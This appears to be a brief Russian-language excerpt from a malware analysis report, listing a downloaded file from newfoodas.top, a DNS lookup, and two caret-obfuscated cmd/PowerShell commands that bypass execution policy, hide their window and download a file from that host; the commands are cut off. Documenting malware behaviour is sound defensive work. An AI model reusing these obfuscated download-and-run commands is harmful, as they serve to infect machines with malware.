Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWe^RSh^e^Ll.e^Xe^ ^-eX^ecutio^N^poLIcY^ ^ByPaSs -nOPr^oFIle^ ^-^Wi^ndo^wsTY^le ^HIDdEN (n^EW-^oBJe^Ct^ SyS^TEM.^nEt^.W^eB^clI^e^NT)^.D^OwNL^OA^dfI^lE^('http://newfoodas.top...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "pOWe^RSh^e^Ll.e^Xe^ ^-eX^ecutio^N^poLIcY^ ^ByPaSs -nOPr^oFIle^ ^-^Wi^ndo^wsTY^le ^HIDdEN (n^EW-^oBJe^Ct^ SyS^TEM.^nEt^.W^eB^clI^e^NT)^.D^OwNL^OA^dfI^lE^('http://newfoodas.top...' (со скрытым окном)